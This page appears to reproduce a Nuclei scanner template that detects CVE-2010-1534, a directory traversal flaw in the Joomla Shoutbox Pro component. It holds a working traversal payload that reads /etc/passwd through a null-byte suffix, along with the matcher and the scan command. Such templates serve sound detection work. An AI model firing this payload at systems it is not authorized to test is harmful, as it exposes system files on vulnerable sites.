Skip to content

Joomla! Component Shoutbox Pro - Local File Inclusion

ID: CVE-2010-1534

Severity: medium

Author: daffainfo

Tags: cve2010,cve,joomla,lfi,edb,joomla.batjo

A directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.

id: CVE-2010-1534
info:
name: Joomla! Component Shoutbox Pro - Local File Inclusion
author: daffainfo
severity: medium
description: A directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version
reference:
- https://www.exploit-db.com/exploits/12067
- https://nvd.nist.gov/vuln/detail/CVE-2010-1534
- http://www.exploit-db.com/exploits/12067
- https://exchange.xforce.ibmcloud.com/vulnerabilities/57534
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2010-1534
cwe-id: CWE-22
epss-score: 0.01385
epss-percentile: 0.86323
cpe: cpe:2.3:a:joomla.batjo:com_shoutbox:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: joomla.batjo
product: com_shoutbox
tags: cve2010,cve,joomla,lfi,edb,joomla.batjo
http:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4b0a00483046022100abb60002bc464257df9d3a3acf0d84ab3e15eda5d294d34ec18a3e97bb1f17eb022100a07b1ec3435a8ec2f6434d7ad0bfd7fa7ff150225c8cd0f24e6f67b2b868d0fc:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2010/CVE-2010-1534.yaml"

View on Github